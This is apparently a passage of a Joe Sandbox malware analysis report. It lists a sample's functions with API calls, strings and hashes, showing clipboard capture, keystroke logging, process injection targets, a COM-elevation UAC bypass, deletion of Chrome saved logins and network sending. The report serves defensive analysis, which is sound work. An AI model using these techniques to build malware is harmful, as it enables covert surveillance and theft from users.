                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                  • API String ID: 726551946-3025026198
                                                  • Opcode ID: c6b8a8b98bbd4d63e6190979d81124dee66bc740cd9cc34f4ffc17523aed10bc
                                                  • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                  • Opcode Fuzzy Hash: c6b8a8b98bbd4d63e6190979d81124dee66bc740cd9cc34f4ffc17523aed10bc
                                                  • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004159C7
                                                  • EmptyClipboard.USER32 ref: 004159D5
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                  • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                  • OpenClipboard.USER32 ref: 00415A61
                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                  • CloseClipboard.USER32 ref: 00415A89
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID:
                                                  • API String ID: 3520204547-0
                                                  • Opcode ID: a85343da43a1715bd37c571cbf66c342c8d19698671e9d286a29ed9399a81fa6
                                                  • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                  • Opcode Fuzzy Hash: a85343da43a1715bd37c571cbf66c342c8d19698671e9d286a29ed9399a81fa6
                                                  • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7
                                                  • API String ID: 0-3177665633
                                                  • Opcode ID: b1fb05e11c356ba634f14b88ac069ae329bf2eb132947a5908c699400be529fa
                                                  • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                  • Opcode Fuzzy Hash: b1fb05e11c356ba634f14b88ac069ae329bf2eb132947a5908c699400be529fa
                                                  • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                  • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                  • GetKeyState.USER32(00000010), ref: 00409B5C
                                                  • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                  • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                  • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID: 8[G
                                                  • API String ID: 1888522110-1691237782
                                                  • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                  • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                  • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                  • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00406788
                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                  • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                  • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                  • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                  • GetLastError.KERNEL32 ref: 00419935
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 3a18b40fc8bca66ce2ef311a5ab80dcc0462769fed9f9a4927e242865a08ad00
                                                  • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                  • Opcode Fuzzy Hash: 3a18b40fc8bca66ce2ef311a5ab80dcc0462769fed9f9a4927e242865a08ad00
                                                  • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: <D$<D$<D
                                                  • API String ID: 745075371-3495170934
                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                  • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                  • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                  • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: @CG$XCG$`HG$`HG$>G
                                                  • API String ID: 341183262-3780268858
                                                  • Opcode ID: ed8315a0d6ff223a23bda433ea7d26a8eccd7836499e4cb6c7eda4d752c804da
                                                  • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                  • Opcode Fuzzy Hash: ed8315a0d6ff223a23bda433ea7d26a8eccd7836499e4cb6c7eda4d752c804da
                                                  • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: 19c2c06b8232b68c8d4956471f5a98e4f6eb949d348f87e42dec8396bb9f2c8b
                                                  • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                  • Opcode Fuzzy Hash: 19c2c06b8232b68c8d4956471f5a98e4f6eb949d348f87e42dec8396bb9f2c8b
                                                  • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                  • GetLastError.KERNEL32 ref: 0040B261
                                                  Strings
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                  • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                  • UserProfile, xrefs: 0040B227
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: 4cd32df34f682fcf287b1bbdb8b1e04e90f5886a02fc20745afa94da3ae3815b
                                                  • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                  • Opcode Fuzzy Hash: 4cd32df34f682fcf287b1bbdb8b1e04e90f5886a02fc20745afa94da3ae3815b
                                                  • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                  • GetLastError.KERNEL32 ref: 00416B02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                  • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                  • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                  • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                  • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004089AE
                                                    • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                    • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                    • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                    • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                  • String ID:
                                                  • API String ID: 4043647387-0
                                                  • Opcode ID: 385440736205027bdb4bf66cb0b92953f00752a2f494ed85ee095fccc58664f2
                                                  • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                  • Opcode Fuzzy Hash: 385440736205027bdb4bf66cb0b92953f00752a2f494ed85ee095fccc58664f2
                                                  • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
